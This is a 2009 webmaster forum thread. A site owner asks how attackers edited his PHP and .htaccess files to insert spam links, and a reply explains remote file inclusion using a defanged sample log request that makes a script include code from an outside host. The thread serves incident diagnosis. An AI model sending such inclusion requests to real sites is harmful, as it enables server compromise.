Site hacked and index.php edited

Forum Moderators: phranque

Message Too Old, No Replies

Site hacked and index.php edited

What kind of access would be required to do this?

surfgatinho

5:17 pm on Mar 4, 2009 (gmt 0)

Various sites I run have been hacked and the index.php file edited to include a load of spam links. On one site the .htaccess file was edited too.

I think the culprit is probably an out of date version of FCK Editor but what I'm trying to understand is how a hacker would be able to edit a file - this would require a pretty high level of compromise.

Both index and .htaccess file permissions were set to 654/644

Any info would be much appreciated.

Thanks

physics

5:48 pm on Mar 4, 2009 (gmt 0)

surfgatinho, sorry to hear it!
Have you checked your log files?
Are you running a CMS?

surfgatinho

10:14 am on Mar 5, 2009 (gmt 0)

Can't find anything too suspect in the log file, although am not 100% sure what I'm looking for.

Yes am running a CMS - but it's a really lightweight bespoke one that just writes to a DB and has plenty of input cleaning.

I'm just wondering what level of access someone would need to write to a file?

Also the hosting (not mine) runs PHP 4.3.10

surfgatinho

10:54 am on Mar 19, 2009 (gmt 0)

Hmm. OK, I removed the file upload script from FCKEditor and there are no writeable directories but they have done it again. Loads of #*$! and pharma links in the index.php and .htaccess file.

Please can some one tell me how an unauthorised user can write to my files?

SteveWh

11:53 am on Mar 19, 2009 (gmt 0)

In order to write files to your site, all they have to do is trick one of your site's PHP scripts to include() a script from an outside site. That script becomes part of your script, and when it runs, it has the full access to your file system that your own PHP scripts have.

The other method is to get your FTP password and download/edit/reupload the files, but that's less common.

In your log file, you'd be looking mainly for "remote file inclusion" attacks. They look like:
GET /yourfile.php?inc=hxxp://someothersite.com/safe.txt?
"safe.txt" is just a placeholder above, but it's one of the most common script names used. It is usually found to be a malicious PHP script. It might run through the files in your site, inserting new text into them.

However, if it was through FCK editor, it might not be as easy to spot, as it will likely be some request to an FCK script, and it might have been a POST, not a GET. But it would be from an IP address that isn't yours, which would make it easier to identify.

Look up FCK editor at Secunia. They might have more specific info about known vulnerabilities and when they were discovered.

[edited by: SteveWh at 11:57 am (utc) on Mar. 19, 2009]

surfgatinho

1:38 pm on Mar 19, 2009 (gmt 0)

Thanks Steve

I think it is RFI. I am using my associates very dodgy hosting. It runs PHP 4.4.9 with register_globals and allow_url_fopen on.

Great, and this is one of the biggest hosting companies in the UK!